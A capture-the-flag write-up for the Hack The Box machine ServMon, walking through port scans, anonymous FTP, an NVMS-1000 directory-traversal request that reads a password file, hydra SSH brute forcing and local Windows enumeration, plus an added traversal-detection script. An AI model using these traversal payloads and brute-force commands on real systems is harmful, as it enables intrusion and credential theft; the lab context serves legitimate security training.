ServMon-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous FTP access, NVMS CMS arbitrary file read vulnerability, hydra password brute forcing, enumerating sensitive information on the C: drive, SSH local port forwarding, analysing and using nscp.exe, NSClient++ 0.5.2.35 - Authenticated Remote Code Execution

Reference: https://otrashoui.xyz/servmon/#privesc

0x01 Obtaining user access

1. Target IP address: 10.10.10.184

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.184

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 --min-rate=10000 -sC -sV 10.10.10.184
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 18:36 CST
Nmap scan report for 10.10.10.184
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-17T10:38:45
|_ start_date: N/A

3. The scan shows that anonymous FTP login is allowed, so log in and check whether any sensitive information is exposed

┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp Anonymous@10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49678|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49680|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49682|)
150 Opening ASCII mode data connection.
02-28-22 07:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
100% |******************************************************************| 168 0.50 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.50 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get Notes\ to\ do.txt
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49688|)
125 Data connection already open; Transfer starting.
100% |******************************************************************| 182 0.42 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.42 KiB/s)
ftp> exit
221 Goodbye.

4. Read the two text files we retrieved

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

5. Two things can be learned here: there is a Passwords.txt on Nathan's desktop, and the confidential files are meant to be stored in SharePoint

6. SMB enumeration turned up nothing

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.184

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.10.184 -N
session setup failed: NT_STATUS_ACCESS_DENIED

7. Look at the site's landing page

http://10.10.10.184/Pages/login.htm

8. Search for known vulnerabilities in NVMS

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit NVMS
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 47774
Exploit: NVMS 1000 - Directory Traversal
URL: https://www.exploit-db.com/exploits/47774
Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
Codes: N/A
Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/47774.txt


┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

9. The exploit-db entry shows that this product has an arbitrary file read (directory traversal) vulnerability; let's verify whether this instance is affected

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.10.184/Pages/login.htm
Cookie: dataPort=6063; lang_type=0x0804%24zh-cn

HTTP/1.1 200 OK
Content-type:
Content-Length: 92
Connection: close
AuthInfo:

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

10. Now use the same traversal to retrieve the password file from Nathan's desktop

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.10.184/Pages/login.htm
Cookie: dataPort=6063; lang_type=0x0804%24zh-cn


HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
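As an added defensive example (not code from the original writeup or from NVMS), here is the check a web server or log reviewer needs in order to catch the traversal requests shown in steps 9 and 10: the request-target is percent-decoded, backslashes are folded, and the path is resolved segment by segment against a virtual web root, so any target that climbs above the root is rejected. The access-log lines are constructed in common log format; NVMS-1000 does not necessarily log this way, so read them as what a reverse proxy or IDS in front of it would record.

```python
"""Detect path-traversal request targets like the NVMS-1000 ones in this writeup.

Added example for this page; not code from the original writeup or from NVMS.
SAMPLE_LOG is constructed: two benign requests and two traversal attempts
shaped like the requests in steps 9 and 10.
"""
import re
from urllib.parse import unquote, urlsplit

SAMPLE_LOG = """\
10.10.14.11 - - [17/Mar/2024:18:40:01 +0800] "GET /Pages/login.htm HTTP/1.1" 200 1214
10.10.14.11 - - [17/Mar/2024:18:41:12 +0800] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.11 - - [17/Mar/2024:18:42:30 +0800] "GET /Pages/../Pages/login.htm HTTP/1.1" 200 1214
10.10.14.11 - - [17/Mar/2024:18:43:05 +0800] "GET /%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
"""

# Matches the quoted request line of a common-log-format entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def canonical_path(target: str) -> str:
    """Decode a request-target into a plain '/'-separated absolute path.

    Percent-decoding runs twice because '%252e' becomes '%2e' after one pass
    and '.' after a second, and some servers decode more than once before
    touching the filesystem. Backslashes are folded to '/' because Windows
    file APIs accept both separators.
    """
    path = urlsplit(target).path          # drop ?query and #fragment
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/")
    return path if path.startswith("/") else "/" + path


def resolve_under_root(target: str):
    """Resolve the target against a virtual web root.

    Returns the normalized absolute path, or None when a '..' segment would
    climb above the root; None is the case a safe server must refuse.
    (posixpath.normpath cannot be used here: it silently drops leading '..'
    on absolute paths, which is exactly the event we want to see.)
    """
    segments = []
    for seg in canonical_path(target).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None
            segments.pop()
        else:
            segments.append(seg)
    return "/" + "/".join(segments)


def escapes_root(target: str) -> bool:
    """True when the request-target climbs above the web root."""
    return resolve_under_root(target) is None


def find_traversal_attempts(log_text: str):
    """Return (client_ip, raw_target) for every logged request that escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        if escapes_root(m.group("target")):
            hits.append((client, m.group("target")))
    return hits


if __name__ == "__main__":
    for client, target in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {target}")
```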

11. Build the username and password lists and try a brute-force login with hydra

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Users.txt
Nathan
Nadine

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$


┌──(kali㉿offsec)-[~/Desktop]
└─$ hydra -L Users.txt -P Passwords.txt ssh://10.10.10.184
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-17 19:34:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-17 19:34:23

12. Log in over SSH and obtain the first flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh Nadine@10.10.10.184
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ED25519 key fingerprint is SHA256:WctzSeuXs6dqa7LqHkfVZ38Pppc/KRlSmEvNtPlwSoQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ED25519) to the list of known hosts.
Nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1

Directory of C:\Users\Nadine\Desktop

02/28/2022 08:05 PM <DIR> .
02/28/2022 08:05 PM <DIR> ..
03/17/2024 03:29 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 6,110,035,968 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
8fb69451ba6ba88fe1b4ae19cce79afa

nadine@SERVMON C:\Users\Nadine\Desktop>

0x02 Obtaining system access

13. Start the usual local information enumeration

nadine@SERVMON C:\Users\Nadine\Desktop>
nadine@SERVMON C:\Users\Nadine\Desktop>
nadine@SERVMON C:\Users\Nadine\Desktop>ps -ano
'ps' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine\Desktop>clear
'clear' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Nadine\Desktop>
PS C:\Users\Nadine\Desktop> ps

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
73 5 2720 4324 5944 1 cmd
77 5 3508 4128 0.03 6756 0 cmd
116 6 1148 4920 0.02 1624 0 conhost
154 9 6640 12596 2420 0 conhost
198 12 7152 18048 5952 1 conhost
482 18 2288 5416 372 0 csrss
325 13 2100 5120 484 1 csrss
361 16 4964 16216 4220 1 ctfmon
254 14 4016 13548 1088 0 dllhost
582 26 23396 50800 968 1 dwm
1413 54 20416 75172 4596 1 explorer
49 6 1496 4536 752 0 fontdrvhost
49 8 4092 9300 760 1 fontdrvhost
0 0 56 8 0 0 Idle
909 23 5432 14520 628 0 lsass
223 13 3040 10456 3288 0 msdtc
783 85 258040 230376 2464 0 MsMpEng
153 38 4612 7512 3848 0 NisSrv
313 23 5820 18552 804 0 nscp
2525 357 343916 373356 4936 1 NVMS-1000
550 28 72896 81348 0.75 1588 0 powershell
0 12 368 12224 88 0 Registry
294 15 6072 16912 3268 1 RuntimeBroker
149 9 1800 7932 4088 1 RuntimeBroker
225 12 2144 12024 5428 1 RuntimeBroker
673 33 21324 62864 4664 1 SearchUI
529 11 4732 9464 620 0 services
694 28 15120 51844 3972 1 ShellExperienceHost
443 17 4900 24432 960 1 sihost
53 3 500 1196 276 0 smss
471 22 5892 16972 2172 0 spoolsv
118 11 1668 6672 2324 0 sshd
135 9 2256 7220 0.02 5404 0 sshd
128 9 2096 7324 6312 0 sshd
149 9 1724 11860 360 0 svchost
115 7 1320 5400 364 0 svchost
213 12 2052 9828 488 0 svchost
85 5 860 3780 732 0 svchost
384 13 10712 14660 748 0 svchost
827 20 6900 22640 776 0 svchost
819 16 4756 11348 860 0 svchost
243 10 1852 7112 904 0 svchost
143 7 1292 5688 956 0 svchost
272 13 3396 10996 1008 0 svchost
197 15 6284 10488 1052 0 svchost
116 14 2840 6968 1192 0 svchost
180 10 1920 8724 1208 0 svchost
208 9 2036 7508 1256 0 svchost
184 9 1764 7608 1280 0 svchost
341 13 3776 10664 1340 0 svchost
226 13 2680 8076 1360 0 svchost
378 18 4880 14188 1384 0 svchost
236 12 2756 11516 1480 0 svchost
307 10 2388 8420 1488 0 svchost
426 9 2748 8936 1504 0 svchost
152 7 1200 5640 1524 0 svchost
261 13 2636 8000 1544 0 svchost
163 9 1724 7916 1668 0 svchost
315 11 2012 8872 1740 0 svchost
185 11 2104 12004 1784 0 svchost
141 9 1676 6660 1848 0 svchost
233 11 2368 9644 1876 0 svchost
399 32 8128 16524 1936 0 svchost
194 11 1956 8184 1976 0 svchost
167 12 1724 7336 2052 0 svchost
180 22 2488 9900 2208 0 svchost
325 16 4476 12100 2224 0 svchost
393 16 10968 19940 2232 0 svchost
206 11 2264 8416 2260 0 svchost
136 8 1468 6228 2332 0 svchost
128 8 1224 5472 2364 0 svchost
209 12 1804 7492 2412 0 svchost
169 10 2124 13272 2484 0 svchost
465 16 3316 11832 2512 0 svchost
324 18 4844 21512 3428 0 svchost
271 13 3352 14616 3580 1 svchost
201 11 2524 11548 3708 0 svchost
365 18 5568 27328 3780 1 svchost
171 9 1496 7304 4144 0 svchost
166 9 4056 11844 4236 0 svchost
249 14 3036 13788 4348 0 svchost
329 16 13116 15380 6540 0 svchost
114 7 1540 6036 6568 0 svchost
170 9 2996 7768 6620 0 svchost
274 20 7852 12748 6712 0 svchost
168 11 2420 13268 6952 0 svchost
1779 0 192 156 4 0 System
196 12 3768 9388 2976 1 taskhostw
178 11 2112 11040 3736 1 taskhostw
156 49 17424 23284 6340 0 TiWorker
136 8 1832 7020 2680 0 TrustedInstaller
169 12 3220 10576 2384 0 VGAuthService
132 8 1628 6600 1236 0 vm3dservice
131 9 1688 7372 5864 1 vm3dservice
388 22 9368 21368 2376 0 vmtoolsd
259 18 5276 16864 5900 1 vmtoolsd
134 10 1532 7028 3980 1 WatchDog
171 11 1460 6836 476 0 wininit
281 12 2780 13120 540 1 winlogon
340 15 7260 15864 3176 0 WmiPrvSE


PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\Nadine\Desktop>

PS C:\Users\Nadine\Desktop> systeminfo
ERROR: Access denied
PS C:\Users\Nadine\Desktop> systeminfo
ERROR: Access denied
PS C:\Users\Nadine\Desktop>

PS C:\Users\Nadine\Desktop> whoami
servmon\nadine
PS C:\Users\Nadine\Desktop> hostname
ServMon
PS C:\Users\Nadine\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::248
IPv6 Address. . . . . . . . . . . : dead:beef::80cc:f626:a006:68c
Link-local IPv6 Address . . . . . : fe80::80cc:f626:a006:68c%6
IPv4 Address. . . . . . . . . . . : 10.10.10.184
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d291%6
10.10.10.2
PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes

====================================== ================ ============ ==========================================
========
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> Get-LocalGroup

Name Description
---- -----------
Access Control Assistance Operators Members of this group can remotely query authorization attributes and p...
Administrators Administrators have complete and unrestricted access to the computer/do...
Backup Operators Backup Operators can override security restrictions for the sole purpos...
Certificate Service DCOM Access Members of this group are allowed to connect to Certification Authoriti...
Cryptographic Operators Members are authorized to perform cryptographic operations.
Device Owners Members of this group can change system-wide settings.
Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects...
Event Log Readers Members of this group can read event logs from local machine
Guests Guests have the same access as members of the Users group by default, e...
Hyper-V Administrators Members of this group have complete and unrestricted access to all feat...
IIS_IUSRS Built-in group used by Internet Information Services.
Network Configuration Operators Members in this group can have some administrative privileges to manage...
Performance Log Users Members of this group may schedule logging of performance counters, ena...
Performance Monitor Users Members of this group can access performance counter data locally and r...
Power Users Power Users are included for backwards compatibility and possess limite...
Print Operators Members can administer printers installed on domain controllers
RDS Endpoint Servers Servers in this group run virtual machines and host sessions where user...
RDS Management Servers Servers in this group can perform routine administrative actions on ser...
RDS Remote Access Servers Servers in this group enable users of RemoteApp programs and personal v...
Remote Desktop Users Members in this group are granted the right to logon remotely
Remote Management Users Members of this group can access WMI resources over management protocol...
Replicator Supports file replication in a domain
Storage Replica Administrators Members of this group have complete and unrestricted access to all feat...
System Managed Accounts Group Members of this group are managed by the system.
Users Users are prevented from making accidental or intentional system-wide c...


PS C:\Users\Nadine\Desktop>


PS C:\Users\Nadine\Desktop> Get-LocalUser

Name Enabled Description
---- ------- -----------
Administrator True Built-in account for administering the computer/domain
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
Nadine True
Nathan True
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application G...


PS C:\Users\Nadine\Desktop>



PS C:\Users\Nadine\Desktop> netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 2224
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 2324
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4936
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 860
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 804
TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 804
TCP 0.0.0.0:6063 0.0.0.0:0 LISTENING 4936
TCP 0.0.0.0:6699 0.0.0.0:0 LISTENING 4936
TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 804
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 748
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1384
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2172
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 2052
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 628
TCP 10.10.10.184:22 10.10.14.11:55902 ESTABLISHED 2324
TCP 10.10.10.184:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.184:6699 10.10.14.11:34224 CLOSE_WAIT 4936
TCP 10.10.10.184:6699 10.10.14.11:34586 CLOSE_WAIT 4936
TCP 10.10.10.184:6699 10.10.14.11:37008 CLOSE_WAIT 4936
TCP 10.10.10.184:6699 10.10.14.11:40054 CLOSE_WAIT 4936
TCP 10.10.10.184:6699 10.10.14.11:40070 CLOSE_WAIT 4936
TCP 10.10.10.184:6699 10.10.14.11:58846 CLOSE_WAIT 4936
TCP 127.0.0.1:49673 127.0.0.1:49674 ESTABLISHED 4936
TCP 127.0.0.1:49674 127.0.0.1:49673 ESTABLISHED 4936
TCP 127.0.0.1:49675 127.0.0.1:49676 ESTABLISHED 4936
TCP 127.0.0.1:49676 127.0.0.1:49675 ESTABLISHED 4936
TCP [::]:21 [::]:0 LISTENING 2224
TCP [::]:22 [::]:0 LISTENING 2324
TCP [::]:135 [::]:0 LISTENING 860
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5666 [::]:0 LISTENING 804
TCP [::]:49664 [::]:0 LISTENING 476
TCP [::]:49665 [::]:0 LISTENING 748
TCP [::]:49666 [::]:0 LISTENING 1384
TCP [::]:49667 [::]:0 LISTENING 2172
TCP [::]:49668 [::]:0 LISTENING 620
TCP [::]:49669 [::]:0 LISTENING 2052
TCP [::]:49670 [::]:0 LISTENING 628
UDP 0.0.0.0:123 *:* 2412
UDP 0.0.0.0:500 *:* 1544
UDP 0.0.0.0:4500 *:* 1544
UDP 0.0.0.0:5353 *:* 1360
UDP 0.0.0.0:5355 *:* 1360
UDP 0.0.0.0:23456 *:* 4936
UDP 0.0.0.0:23456 *:* 4936
UDP 0.0.0.0:56431 *:* 4936
UDP 0.0.0.0:57208 *:* 804
UDP 10.10.10.184:137 *:* 4
UDP 10.10.10.184:138 *:* 4
UDP 127.0.0.1:56428 *:* 2512
UDP 127.0.0.1:57207 *:* 804
UDP [::]:123 *:* 2412
UDP [::]:500 *:* 1544
UDP [::]:4500 *:* 1544
UDP [::]:5353 *:* 1360
UDP [::]:5355 *:* 1360
PS C:\Users\Nadine\Desktop>Get-ChildItem -Path C:\ -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue



Directory: C:\Program Files\NSClient++


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/14/2020 1:24 PM 51 boot.ini
-a---- 1/18/2018 3:51 PM 157453 changelog.txt
-a---- 11/5/2017 10:04 PM 18351 license.txt
-a---- 4/10/2020 6:32 PM 2683 nsclient.ini







PS C:\Users\Nadine\Desktop>

14. After a round of enumeration, we found a directory whose contents match the web service on port 8443

15. Inspect the NSClient++ files

PS C:\Users\Nadine\Desktop> cd C:\"Program Files"\
PS C:\Program Files> dir


Directory: C:\Program Files

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/1/2022 1:20 AM Common Files
d----- 11/11/2019 6:52 PM internet explorer
d----- 2/28/2022 6:07 PM MSBuild
d----- 2/28/2022 6:55 PM NSClient++
d----- 2/28/2022 6:46 PM NVMS-1000
d----- 2/28/2022 6:32 PM OpenSSH-Win64
d----- 2/28/2022 6:07 PM Reference Assemblies
d----- 2/28/2022 5:44 PM VMware
d-r--- 11/11/2019 6:52 PM Windows Defender
d----- 11/11/2019 6:52 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 11/11/2019 6:52 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 11/11/2019 6:52 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 2/28/2022 6:25 PM WindowsPowerShell


PS C:\Program Files> cd NSClient++
PS C:\Program Files\NSClient++>
PS C:\Program Files\NSClient++> dir


Directory: C:\Program Files\NSClient++


